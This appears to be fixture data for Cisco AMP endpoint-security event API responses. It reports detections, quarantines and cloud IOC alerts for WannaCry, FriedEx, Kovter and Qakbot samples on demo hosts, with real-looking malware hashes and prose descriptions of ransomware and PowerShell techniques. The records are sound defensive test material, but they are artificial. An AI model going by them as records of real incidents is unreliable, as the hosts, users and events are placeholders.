Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3808,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} 